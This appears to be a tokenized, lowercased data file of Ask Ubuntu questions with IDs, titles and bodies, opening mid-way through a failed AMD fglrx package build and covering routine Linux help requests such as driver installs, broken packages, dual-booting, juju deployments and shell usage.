'' \ -e `` s| # bindir # |usr/bin|g '' \ -e `` s| # sysconfdir # |etc|g '' \ -e `` s| # mandir # |usr/share/man/man1|g '' \ -e `` s| # ldsoconf # |usr/lib/fglrx/ld.so.conf|g '' \ -e `` s| # altldsoconf # |usr/lib/fglrx/alt_ld.so.conf|g '' \ -e `` s| # altpriority # |1000|g '' \ -e `` s| # pxaltpriority # |900|g '' \ -e `` s| # autostartdir # |etc/xdg/autostart|g '' \ -e `` s| # datadir # |usr/share|g '' \ -e `` s| # pkgdeskdir # |usr/share/fglrx|g '' \ -e `` s| # pkgdatadir # |usr/share/fglrx|g '' \ -e `` s| # pkgconfigdir # |usr/lib/fglrx|g '' \ -e `` s| # pkgbindir # |usr/lib/fglrx/bin|g '' \ -e `` s| # pkglibdir # |usr/lib/fglrx|g '' \ -e `` s| # pkglibdir32 # |usr/lib32/fglrx|g '' \ -e `` s| # pkgdriversdir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextra # |usr/lib/x86_64-linux-gnu/xorg/extra-modules|g '' \ -e `` s| # pkgextensiondir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextensionsdir # |usr/lib/xorg/modules/extensions|g '' \ -e `` s| # drivername # |fglrx|g '' \ -e `` s| # driverdevname # |fglrx-dev|g '' \ -e `` s| # driversrcname # ||g '' \ -e `` s| # includedir # |usr/include|g '' \ -e `` s| # pkglibconfdir # |lib/fglrx|g '' \ -e `` s| # grubblklistdir # |usr/share/grub-gfxpayload-lists/blacklist|g '' \ -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # pxdir # |usr/lib/pxpress|g '' \ -e `` s| # pxdir32 # |usr/lib32/pxpress|g '' \ -e `` s| # pxxmoddir # |usr/lib/pxpress/xorg/modules|g '' \ -e `` s| # pxdirname # |pxpress|g '' \ -e `` s| # pxlibdir # |usr/lib/pxpress/lib|g '' \ -e `` s| # pxlibdir32 # |usr/lib32/pxpress/lib|g '' \ -e `` s| # pxldsoconf # |usr/lib/pxpress/ld.so.conf|g '' \ -e `` s| # altpxldsoconf # |usr/lib/pxpress/alt_ld.so.conf|g '' \ -e `` s| # cversion # |13.350|g '' \ -e `` s| # srcxarch # |xpic_64a|g '' \ -e `` s| # srcarch # |x86_64|g '' \ -e `` s| # srcotherarch # |x86|g '' \ -e `` s| # srclibdir # |lib64|g '' \ -e `` s| # deb_host_multiarch # |x86_64-linux-gnu|g '' \ -e `` s| # other_arch # |i386-linux-gnu|g '' \ debian/ $ i.in > debian/ $ i ; \ done # remove exec bit on everything find arch \ etc \ lib \ module \ usr \ xpic_64a -type f | xargs chmod -x find : `module ' : no such file or directory # set executable on user apps find arch/x86_64/usr/sbin \ arch/x86_64/usr/x11r6/bin \ usr/sbin/ -type f | xargs chmod a+x # set exec bit on scripts find lib etc debian -name `` *.sh '' -type f | xargs chmod +x # set the permissions on the pxpress scripts chmod 744 debian/pxpress/switch* dh build make : dh : command not found make : *** [ build-arch ] error 127 dpkg-buildpackage : error : debian/rules build gave error exit status 2 removing temporary directory : fglrx-install.1xtqfa edit : when i use only sudo ./amd-driver-installer-13.35.1005-x86.x86_64.run it runs fine , but i want to use it compiled to ubuntu 13.10 .
429954	how to install a custom ubuntu touch kernel on the nexus 10	i 've just installed the latest version of ubuntu touch on my nexus 10 tablet , but it does not fit my needs . instead of it , i would like to install a minimal version of ubuntu or debian running with the kernel 3.13 . i want to do that for several reasons : 1 ) my nexus 10 has not so much space inside of it 2 ) i do n't want unity and a lot of other packages contained inside the current ubuntu touch release 3 ) i want to start to learn how things works from the beginning 4 ) i want to install a lighter desktop environment such as lxde or xfce 5 ) i want to try to use x11 instead of mir 6 ) the kernel 3.13 works good for the arm chromebook , why it should not work for the nexus 10 , also ? ... ( read here : ) http : //www.virtualopensystems.com/en/solutions/guides/kvm-on-chromebook/ so , can you help me ? i would like to know how can i do that , do you have some tutorial so i can learn ? thanks .
429955	meaning of directory redirection using dot operator	i know that . means current directory and .. means one directory up from my current directory but when i put / and .. after i got confused what that meant . please explain this a bit . in shot what does ../.. mean ?
429956	how to install chrome dev ?	no ! ! ! i want to download chrome dev to get dev version of libpepperflash or whatever it is called now and add it to chromium . also do pre `` stable '' channels add repository auto ? * if not what is the repository ?
429960	fix workspaces in xfce with multiple monitors	i recently install xfce , and got dual monitors working by installing the amd catalyst drivers . now i have one workspace per monitor . when dragging windows from one monitor to another , they are instead dragged to a different workspace on the same monitor . i am wondering how to fix this .
429965	typical command / super key usage on a mac	i 'm running ubuntu 13.10 on a macbook pro 11,2 . there are several key combinations which are standard on a mac , and i 'd like to utilize them . if someone could help me with one or a few of these , i 'd be happy : clear a a line of text using the super + backspace key combination . in a browser , search for text using the super + f key . in a browser , super + l highlights the url .
429966	output analogue audio ( via speakers ) through `` line in '' jack	... so i 've been using ubuntu for about 6 months now since i switched from windows . i 've been searching for one specific feature that was missing for ubuntu ... in windows i used to connect my headphone and speakers to two jacks , one is a normal analogue audio output jack and the other was a line-in jack . i was able to make it output analogue audio via a software called `` realtek hd audio manager '' but this software does n't have a linux version . it 's so bad that i have to get up every time i need to switch between my devices since i 'm limited to one jack . bottom line , the question is ; how do i output analogue audio from my `` line-in '' jack ? i need an alternative software to that mentioned above .
429969	how to run a program from terminal , which allows to close terminal after the program is open ?	could someone remind me how do i run application through the terminal , which allow me to close the terminal after the program is open . i totally forgot how to do this . please let me know .
429979	add armhf as a suppoted architecture for guest kvm vms ( on a amd64 host )	i have an ubuntu server 12.04 setup with about 6 kvm vms running . guests are all x86 or amd64 , host is a 2-socket westmere xeon box . now i want to create a new guest vm but this time the guest vm should run an armhf image ( a raspberry pi image ) . what i was expecting would work : open virt-manager , go through the usual setup steps to create a new vm and then choose qemu and armhf as the architecture of the guest . why it did not work : i can only see x86 and amd64 as options for the architecture of the guest . is there anyway i can install qemu support for armhf so that i can easily create armhf kvm guests on my server using virt-manager ? i want to make as little changes as possible on the host . i do not want to use xen or virtualbox , it has to be kvm . thanks !
429980	packages are failing to install due to broken packages	i 'm unsure how to get around the following , help is appreciated ! $ sudo apt-get autoremove [ sudo ] password for heath : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo dpkg -- configure -a $ sudo apt-get install kubuntu-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kubuntu-desktop : depends : kde-workspace but it is not going to be installed depends : okular but it is not going to be installed depends : plasma-desktop but it is not going to be installed depends : plasma-netbook but it is not going to be installed depends : software-properties-kde but it is not going to be installed recommends : akregator but it is not going to be installed recommends : apport-kde but it is not going to be installed recommends : apturl-kde but it is not going to be installed recommends : jockey-kde but it is not going to be installed recommends : kaddressbook but it is not going to be installed recommends : kate but it is not going to be installed recommends : kde-config-touchpad but it is not going to be installed recommends : kdepim-kresources but it is not going to be installed recommends : kexi but it is not going to be installed recommends : kmail but it is not going to be installed recommends : knotes but it is not going to be installed recommends : kontact but it is not going to be installed recommends : korganizer but it is not going to be installed recommends : krita but it is not going to be installed recommends : kubuntu-firefox-installer but it is not going to be installed recommends : kubuntu-notification-helper but it is not going to be installed recommends : libreoffice-kde but it is not going to be installed recommends : muon but it is not going to be installed recommends : muon-discover but it is not going to be installed recommends : muon-notifier but it is not going to be installed recommends : plasma-widget-facebook but it is not going to be installed recommends : plasma-widgets-addons but it is not going to be installed recommends : usb-creator-kde but it is not going to be installed e : unable to correct problems , you have held broken packages . here 's the update after trying the advice in the page which was linked to ( when someone marked this as a duplicate ) : sudo apt-get clean & & sudo apt-get autoclean & & sudo apt-get -f install & & sudo dpkg -- configure -a & & sudo apt-get -f install [ sudo ] password for heath : reading package lists ... done building dependency tree reading state information ... done reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . [ hsenv ] ( d ) ➜ ~ sudo apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . [ hsenv ] ( d ) ➜ ~ sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... starting pkgproblemresolver with broken count : 0 starting 2 pkgproblemresolver with broken count : 0 done done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . [ hsenv ] ( d ) ➜ ~ mkdir ppa-purge & & cd ppa-purge & & wget //mirror.pnl.gov/ubuntu/pool/universe/p/ppa-purge/ppa-purge_0.2.8+bzr56_all.deb & & wget //mirror.pnl.gov/ubuntu//pool/main/a/aptitude/aptitude_0.6.6-1ubuntu1_i386.deb & & sudo dpkg -i ./*.deb -- 2014-03-06 09:56:34 -- //mirror.pnl.gov/ubuntu/pool/universe/p/ppa-purge/ppa-purge_0.2.8+bzr56_all.deb resolving mirror.pnl.gov ( mirror.pnl.gov ) ... 192.101.102.2 connecting to mirror.pnl.gov ( mirror.pnl.gov ) |192.101.102.2|:80 ... connected . http request sent , awaiting response ... 200 ok length : 4360 ( 4.3k ) [ application/x-troff-man ] saving to : ‘ppa-purge_0.2.8+bzr56_all.deb’ 100 % [ ================================================================================================================================================ > ] 4,360 -- .-k/s in 0s 2014-03-06 09:56:34 ( 14.6 mb/s ) - ‘ppa-purge_0.2.8+bzr56_all.deb’ saved [ 4360/4360 ] -- 2014-03-06 09:56:34 -- //mirror.pnl.gov/ubuntu//pool/main/a/aptitude/aptitude_0.6.6-1ubuntu1_i386.deb resolving mirror.pnl.gov ( mirror.pnl.gov ) ... 192.101.102.2 connecting to mirror.pnl.gov ( mirror.pnl.gov ) |192.101.102.2|:80 ... connected . http request sent , awaiting response ... 200 ok length : 2352134 ( 2.2m ) [ application/x-troff-man ] saving to : ‘aptitude_0.6.6-1ubuntu1_i386.deb’ 100 % [ ================================================================================================================================================ > ] 2,352,134 782kb/s in 2.9s 2014-03-06 09:56:38 ( 782 kb/s ) - ‘aptitude_0.6.6-1ubuntu1_i386.deb’ saved [ 2352134/2352134 ] selecting previously unselected package aptitude . ( reading database ... 230150 files and directories currently installed . ) unpacking aptitude ( from ... /aptitude_0.6.6-1ubuntu1_i386.deb ) ... selecting previously unselected package ppa-purge . unpacking ppa-purge ( from ... /ppa-purge_0.2.8+bzr56_all.deb ) ... dpkg : dependency problems prevent configuration of aptitude : aptitude depends on libapt-pkg4.12 ( > = 0.8.16~exp12ubuntu6 ) . aptitude depends on libboost-iostreams1.46.1 ( > = 1.46.1-1 ) . aptitude depends on libc6 ( > = 2.4 ) . aptitude depends on libcwidget3 . aptitude depends on libept1.4.12 . aptitude depends on libgcc1 ( > = 1:4.1.1 ) . aptitude depends on libncursesw5 ( > = 5.6+20070908 ) . aptitude depends on libsigc++-2.0-0c2a ( > = 2.0.2 ) . aptitude depends on libsqlite3-0 ( > = 3.6.5 ) . aptitude depends on libstdc++6 ( > = 4.6 ) . aptitude depends on libtinfo5 . aptitude depends on libxapian22 . dpkg : error processing aptitude ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ppa-purge : ppa-purge depends on aptitude . dpkg : error processing ppa-purge ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... errors were encountered while processing : aptitude ppa-purge
429984	creating desktop or terminal comands shortcuts to open a program	i recently installed tor browser and in the site below the installation steps it says to move to the downloaded folder via terminal and then type ./ start-tor-browser to start tor , and it works . if i click the start-tor-browser file a text editor with code pops up.. how can i make a desktop shortcut or , if i ca n't , a shortcut for the commands to just type tor ( for example ) in terminal instead of the two or three required commands every time i want to run tor ?
429990	when i delete a synced folder on my computer , why is it not removed from my ubuntu one cloud ?	when i deleting a synced folder on my computer , it is not removed from my ubuntu one cloud . i would expect ( and want ) the local change to be reflected in my cloud . what could be the problem ? thank you .
429991	get ubuntu to not move windows when turning off one of multiple monitors	i have a triple monitor setup and it works very well with 13.10 . however , i have some problems with the way ubuntu moves windows around when turning off a monitor . for instance , when i want to watch a movie i only want to use one monitor . however , when i turn off the other screens , the windows located on these will all move to the one monitor i use for a movie . if i turn on the screens again the windows move back but not always to the same place and it 's still kind of a hassle to suddenly have a huge bunch of windows pile up on the monitor you were just starting a movie on . it also means that my screens will blank out for 3 seconds , every time i turn one of the monitors on or off - probably to adjust x/compiz , i guess ? i know this is probably intended behavior , since it would make a lot of sense with a laptop setup . but with a triple monitor desktop setup , i really just want my windows to stay where they are , screens off or not . if i need whatever was on them , i 'll just turn them on . just some way to blank them would be nice , too . is there any way to turn off this feature ? for the record , i 'm running the nvidia proprietary driver .
429994	ca n't upgrade from ubuntu 13.04 to 13.10	i do sudo do-release-upgrade , and i got an error message like this one . an unresolvable problem occurred while calculating the upgrade . this can be caused by : upgrading to a pre-release version of ubuntu running the current pre-release version of ubuntu unofficial software packages not provided by ubuntu how i can solve this ?
429995	rvm how turn it on always when we open terminal in ubuntu 13.10	i am new user of 13.10 ubuntu i am facing one problem when want to install rvm , even though it is already install and using it on virtualt box . problem is that when i start terminal and put to check my rvm is working or not with this ? ? than i try to change put this in your ~/.bash_profile and ~/.bashrc : # this loads rvm into a shell session . [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & . `` $ home/.rvm/scripts/rvm '' but again when close terminal and try to check rvm is working or not its say when i try $ type rvm | head -1 and also try to check with $ type rvm | head -n 1 but rails not working showes after i found another site that below code its start work user $ source ~/.rvm/scripts/rvm and than check rvm status it is started , $ type rvm | head -1 '' rvm is a funcation '' working correctly but when i closed and open it next time its not working again than i put $ echo ' [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & . `` $ home/.rvm/scripts/rvm '' # load rvm function ' > > ~/.bash_profile and close terminal again start but not rvm start automatically with terminal start if i use this code its work user $ source ~/.rvm/scripts/rvm my questions is that how much rvm is importnat to work with terminal start when we want to do work on ruby ? ? how we can run rvm open dirctlly with out user $ source ~/.rvm/scripts/rvm in terminal ? ? i mean when we start our terminal rvm will start autmatically ? ? what is the role of rvm in rails project if we have install already rail is it neccessary rvm will work with it ? ?
429996	find word that has more than 50 characters	i am trying to use find in combination with grep to find all the php files in my web server which have a word ( any sequence of characters except whitespace ) with more than 50 characters . i have this base : find . -name '*.php ' -exec fgrep -q ' . { 50 } ' { } \ ; -print but is not working as expected . thanks
430000	why is juju failing to deploy my sharded mongodb cluster ?	i am trying to deploy a sharded mongodb cluster on amazon ec2 , using the directions at http : //manage.jujucharms.com/charms/precise/mongodb . however ( and i have tried this three times ) , my mongos unit always fails , with agent-state-info : hook failed : `` mongos-relation-changed '' here 's the output of juju status : environment : amazon machines : `` 0 '' : agent-state : started agent-version : 1.16.6 dns-name : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com instance-id : i-e36159c2 instance-state : running series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m `` 1 '' : agent-state : started agent-version : 1.16.6 dns-name : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com instance-id : i-b7645c96 instance-state : running series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m `` 2 '' : agent-state : started agent-version : 1.16.6 dns-name : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com instance-id : i-d5645cf4 instance-state : running series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m `` 3 '' : agent-state : started agent-version : 1.16.6 dns-name : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com instance-id : i-98665eb9 instance-state : running series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m `` 4 '' : agent-state : started agent-version : 1.16.6 dns-name : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com instance-id : i-fa645cdb instance-state : running series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m services : configsvr : charm : cs : precise/mongodb-26 exposed : false relations : configsvr : - mongos replica-set : - configsvr units : configsvr/0 : agent-state : started agent-version : 1.16.6 machine : `` 1 '' open-ports : - 27017/tcp - 27019/tcp - 27021/tcp - 28017/tcp - 28019/tcp public-address : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com mongos : charm : cs : precise/mongodb-26 exposed : true relations : mongos : - shard1 - shard2 mongos-cfg : - configsvr replica-set : - mongos units : mongos/0 : agent-state : error agent-state-info : 'hook failed : `` mongos-relation-changed '' ' agent-version : 1.16.6 machine : `` 2 '' open-ports : - 27017/tcp - 27019/tcp - 28017/tcp public-address : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com shard1 : charm : cs : precise/mongodb-26 exposed : true relations : database : - mongos replica-set : - shard1 units : shard1/0 : agent-state : started agent-version : 1.16.6 machine : `` 3 '' open-ports : - 27017/tcp - 27019/tcp - 27021/tcp - 28017/tcp public-address : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com shard2 : charm : cs : precise/mongodb-26 exposed : true relations : database : - mongos replica-set : - shard2 units : shard2/0 : agent-state : started agent-version : 1.16.6 machine : `` 4 '' open-ports : - 27017/tcp - 27019/tcp - 27021/tcp - 28017/tcp public-address : ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com here 's the output from tail /var/log/juju/unit-mongos-0.log on mongos/0 : 2014-03-05 19:59:44 info worker.uniter.jujuc server.go:108 running hook tool `` juju-log '' [ `` mongos_relation_change : undefined rel_type : none '' ] 2014-03-05 19:59:44 debug worker.uniter.jujuc server.go:109 hook context id `` mongos/0 : mongos-cfg-relation-changed:7095643384867257998 '' ; dir `` /var/lib/juju/agents/unit-mongos-0/charm '' 2014-03-05 19:59:44 info juju juju-log.go:66 mongos/0 mongos-cfg:5 : mongos_relation_change : undefined rel_type : none 2014-03-05 19:59:45 error juju.worker.uniter uniter.go:350 hook failed : exit status 1 2014-03-05 19:59:45 debug juju.worker.uniter modes.go:423 modeabide exiting 2014-03-05 19:59:45 info juju.worker.uniter modes.go:421 modehookerror starting 2014-03-05 19:59:45 debug juju.worker.uniter.filter filter.go:418 want resolved event 2014-03-05 19:59:45 debug juju.worker.uniter.filter filter.go:412 want forced upgrade true 2014-03-05 19:59:45 debug juju.worker.uniter.filter filter.go:523 no new charm event 2014-03-05 20:06:32 debug juju.worker.uniter.filter filter.go:338 got relations change what 's going on ? how do i fix this ? a workaround is okay : )
430001	read file over http in shell	i want to know if it is possible to read files over http like : $ cat http : //example.com/archive/myhouse.txt is it possible ? and is there any extra or better ways to do it ? thanks !
430004	x ubuntu bluetooth audio sync not working	i have xubuntu 13.10 and i can not make my logitech bluetooth audio adapter work . i get this message : connection failed : stream setup failed for the moment , the light on device is green but after one second becomes red again . i have tried several tutorials from various forums but without any luck . is there anything that works for sure ? thanks for interest
430006	infinite computer reboot loop when the ubuntu disk inserted	i am currently using windows 8.1 . i want to install ubuntu as a dual boot . i burned the disk and put it in the drive and rebooted . ubuntu first loads some things , then shows a little insignia at the bottom after which it just shows a black screen with a rapidly blinking cursor . after about a minute the computer reboots and the process continues until the disk is removed . i tried both ubuntu 13.10 and 12.04 , both gave the same result . i have left the computer with the disk in for about an hour , during which it constantly looped .
430007	error while installing skype on ubuntu 12.04 lts pangolien	shailendra @ ubuntu : ~ $ sudo dpkg -i skype [ sudo ] password for shailendra : selecting previously unselected package skype : i386 . ( reading database ... 174634 files and directories currently installed . ) unpacking skype : i386 ( from skype ) ... dpkg : dependency problems prevent configuration of skype : i386 : skype : i386 depends on libasound2 ( > = 1.0.23 ) . skype : i386 depends on libc6 ( > = 2.3.6-6~ ) . skype : i386 depends on libc6 ( > = 2.7 ) . skype : i386 depends on libgcc1 ( > = 1:4.1.1 ) . skype : i386 depends on libqt4-dbus ( > = 4:4.5.3 ) . skype : i386 depends on libqt4-network ( > = 4:4.8.0 ) . skype : i386 depends on libqt4-xml ( > = 4:4.5.3 ) . skype : i386 depends on libqtcore4 ( > = 4:4.7.0~beta1 ) . skype : i386 depends on libqtgui4 ( > = 4:4.8.0 ) . skype : i386 depends on libqtwebkit4 ( > = 2.2~2011week36 ) . skype : i386 depends on libstdc++6 ( > = 4.6 ) . skype : i386 depends on libx11-6 . skype : i386 depends on libxext6 . skype : i386 depends on libxss1 . skype : i386 depends on libxv1 . skype : i386 depends on libssl1.0.0 . dpkg : error processing skype : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : skype : i386 shailendra @ ubuntu : ~ $ sudo dpkg -i package.deb dpkg : error processing package.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : package.deb shailendra @ ubuntu : ~ $ dpkg -- add-architecture i386 dpkg : error : unknown option -- add-architecture type dpkg -- help for help about installing and deinstalling packages [ * ] ; use dselect ' oraptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through less ' ormore ' ! shailendra @ ubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done
430008	how to install neovim on ubuntu ?	how can i install neovim on ubuntu ? should i compile it from source ? the installation steps are a little bit blurry for me ...
430014	i ca n't open compizconfig settings manager in ubuntu 13.10	when i upgraded my ubuntu from 'raring ringtail ' to 'saucy salamander ' my compizconfig setting manager does not open . when i type fusion-icon in terminal , i see the following message : compizconfig - error : unable to find interface type 2 on 0xbff6dd24 when i type ccsm in terminal , we have : compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity falha de segmentação ( imagem do núcleo gravada ) what i do ?
430015	how to install code composer studio on ubuntu ?	i 'm trying to install ti 's code composer studio on my ubuntu 13.10 [ 64-bit ] . i 've downloaded ccs 5.5.0.00077 . also i 've eclipse 3.8.1 installed . i 've followed the instructions here on ti 's web site . i start the installation of ccs successfully and choose to install ccs into to my current eclipse installation . i choose the eclipse 's location in ccs setup as /usr/lib/eclipse ( it 's where the eclipse executable is , i checked it ) . the ccs installer responds me saying that unable to determine your eclipse install version for compatibility . do you want to continue ? , so i continue , and this time i get the error message that says ccs needs cdt version 8.1.0 or higher . please install cdt and try again or change the eclipse location . the last error message hangs the installation and it 's weird since i 've cdt installed . i 've followed the instructions to install cdt as well from ti 's instructions . so what going on ? is my cdt installation wrong or is there something wrong with the location i choose for my eclipse installation ?
430017	macbookpro display issue when booting via usb stick to live mode	greetings ubuntu community . i 'm currently trying to set up ubuntu 13.10 on my macbookpro11,2 . i 'm trying to follow the instructions outlined on the macbookpro11-1/saucy page . i downloaded the non-mac 64-bit iso ( ubuntu-13.10-desktop-amd64.iso ) and used unetbootin to create the bootable usb stick . i also tried an alternative method described here . both stick drive creation methods allowed me to boot to live mode via usb , but the resulting experience is not easy on the eyes . it appears as vertical pastel stripes that are a few pixels wide . here is a photo i took of the display . i tried adjusting the resolution , but it just changes the width of the crazy stripes . i ca n't stand to look at it for more than a few seconds at a time . let me know if you have any idea what the issue may be . thank you .
430018	slpreg error in cups log	as i was troubleshooting a printing problem , i came across the following line in the cups error log : slpreg of `` hp_officejet_g55 '' failed with status -20 ! it appears to occur every 30 seconds or so . what does it mean ? why is it there ? how do i prevent it from happening ?
430019	reinstalling ubuntu 12.04 on a dual booted system with swap file	after installing my amd drivers from their website , i ran into some problems and now i boot into `` low graphics mode '' . i decided to reinstall ubuntu with the live cd . the first time i installed ubuntu i made a swap partition . i did n't use wubi by the way . when im going to reinstall im going to press the `` erase data and reinstall ubuntu '' option . does this delete the swap partition ? if it does n't delete the swap partition , should i just select the `` install alongside windows option '' when installing it ? i 'm a beginner btw please help ... hp probook 4530s intel i5 - 2450m 2.50ghz amd radeon hd 7470m 8gb ram windows 7 professional
430029	how do i deploy a specific revision of a charm ?	i am trying to deploy a charm , mongodb with the following : juju deploy mongodb but the newest revision introduced a bug , or for some other reason i want to deploy an older version of the charm , how can i do this ?
430033	what 's wrong with my hdd ? it takes 5 minutes to mount !	every time i need to mount my hard disk , i need to do this : i type sudo fdisk -l into terminal i wait 5 minutes till it completes `` its scan '' ; i mean till it shows up my hdd i input the mount command if i input the mount command directly then the terminal would hang forever and it would n't mount see my old question ( when i was first learning to mount ) for more information about my hdd if that might help in diagnosis . output of uname -r : 3.11.0-17-generic ... i have no idea what that means . the hard disk is connected but not mounted .
430035	gtx 560 driver problem	i have a gtx 560 graphic card http : //wiki.ubuntuusers.de/grafikkarten/nvidia/nvidia # links which one i must use ?
430036	need advice installing ubuntu on 2nd storage drive for windows 7 computer	basically i have 2 drives on my pc . one ssd with win 7 os and most apps it would utilize . my 2nd drive is a 1tb sata 3 that only has basically steam apps and a few odds and ends like downloads . i would like to partition a portion of the sata drive for 2-300gb to install ubuntu as a second os and keep the remainder for windows 7 without disturbing anything i have already . i have already defragged the sata storage volume to attempt to save data loss from partitioning . currently ntfs on both volumes . i have found many useful articles but none that really defined my situation exactly . im sure its an easy solution , but i figured asking the experts could n't hurt as im very new to linux anything . thanks in advance for any help !
430037	how can i install chromium development ?	http : //www.chromium.org/getting-involved/dev-channel 32 bit deb i get is chrome not chromium ! where can i install chromium dev not chrome dev ? ?
430038	multiple thunderbird users using same local directory	i have two users `` tramp '' and `` office '' on my desktop , and i want to run thunderbird from both users ( i trust both users ) . i dont have enough disk space , so i want both the users to use the same local directory . is this possible ? i googled and found two solutions , but both dont seem to work : -- > solution 1 with users `` default '' and `` newbie '' sudo addgroup default-thunderbird sudo usermod -a -g default-thunderbird default sudo usermod -a -g default-thunderbird newbie cp -r ~/.mozilla/thunderbird ~/.mozilla/thunderbird.backup chgrp -r default-thunderbird ~/.mozilla/thunderbird chmod g+rw ~/.mozilla/thunderbird find ~/.mozilla/thunderbird -type d -exec chmod g+x \ { \ } \ ; and then , with thunderbird not running , newbie could run : mv ~/.mozilla/thunderbird ~/.mozilla/thunderbird.old ln -s ~default/.mozilla/thunderbird ~/.mozilla/thunderbird the above solution gives me a permission error and even if i change permissions , the settings are not picked up . -- > solution 2 gksu -u default thunderbird the command just exits without opening thunderbird and without giving any error . thanks in advance ,
430040	what is the file size of the ubuntu iso image ?	what is the file size of the ubuntu iso image ? i have limited internet , and do n't want to use too much of it . i want to put it on a disc or usb thumb drive and install it on a unused computer .
430047	is there a way to install 13.10 on btrfs and full disk encryption ?	i like the fact that the default desktop ubuntu installer only requires me to check a single checkbox in order to have a fully encrypted disk in the end ( which is a requirement within our company , so there is no way around that ) . on the other hand , i would like to give btrfs a try ... seems like performance and stability are `` ok '' by now ; and snapshots for backup seem to work great . but ... there is no way to achieve that with the ubuntu installer - its `` full disk encryption on ext4 '' ... or `` do something else '' , and then all the work is on my shoulders . so , are there any `` easy '' options to install a 64 bit 13.10 on btrfs with fde ?
430055	how to make xrdp display preexisting open programs	i use xrdp to remotely connect from my windows 7 laptop to my ubuntu 13.10 server , which works perfectly ... until i disconnect . then , the next time i connect , all my programs are gone , presumably because it 's starting a new session . i looked around for ways to fix this , and none of them work . they all give me an `` unable to connect '' error in the dialog box after entering my password when xrdp starts . i forwarded port 5900 in my router , and then set xrdp.ini to connect with 127.0.0.1 and port 5900 . i also configured vino to allow other users to view , and then control my desktop . what is set wrong ? i followed several different tutorials and they all gave the same result . if i ca n't do this , is there some other software i can use that connects via windows remote desktop connection ( i.e . no installing programs , for when i 'm on a machine w/o admin access ) ? i 'm getting tired of leaving the connection open , and my computer out of sleep mode , if i want to be able to access my minecraft server 's console ... also , will this work even if the windows 7 computer is in sleep mode ? and is there a setting that lets me close the session on one computer with programs running , and then connect from a different computer and still have access to the same programs ?
430059	copy system to another computer	remastersys apparently let you do this ? it 's gone now . i have a development machine , and i 'd like to basically clone it , and install it on a laptop , so i do n't have to reinstall everything . is that possible ? i have a bootable usb , that i made persistent , but i only used it to install ubuntu originally . can i use that to accomplish this ?
430061	how to create alias with g++ ?	i 'm trying to create an alias on ubuntu for the bellow commands : g++ -lsdl -lsdlmain -lsdl_image -lgl -lglu src.cpp -o a.out g++ -lgl -lglut `sdl-config -- cflags -- libs` src.cpp -o a.out when i execute them in the terminal all goes very well , but if i create aliases for them i find the following error : /usr/lib/gcc/i686-linux-gnu/4.6/../../../i386-linux-gnu/crt1.o ( .text+0x18 ) : error : undefined reference to 'main' collect2 : ld returned 1 exit status bash : -l/usr/lib/i386-linux-gnu : no such file or directory the aliases are : alias g++= '' g++ -lgl -lglut `sdl-config -- cflags -- libs` '' alias gcpp= '' g++ -lsdl -lsdlmain -lsdl_image -lgl -lglu ''
430063	would ubuntu 13.10 work on unallocated space with windows 8.1 ?	i 've not been able to find this answer anywhere else . are you able to install ubuntu 13.10 alongside windows 8.1 on unallocated space ? i did this with windows 7 , but i had to cover all of those partitions and make one primary for the windows 8.1 installation . thanks for an answer , if anyone replies .
430065	tar a folder minus one sub-folder	i 'm trying to create a tar archive of a folder thisfolder but want to omit a sub-folder named notthisfolder . can someone show me how to do this ? i 've tried to tar'ing the entire folder and removing the one i want to omit but that particular folder is 17gb . \thisfolder file1 file2 \notthisfolder omitfile1 omitfile2 \butincludethisfolder includefile1 infludefile2 i was using tar -- exclude='notthisfolder ' -zcvpf archive.tar /thisfolder/
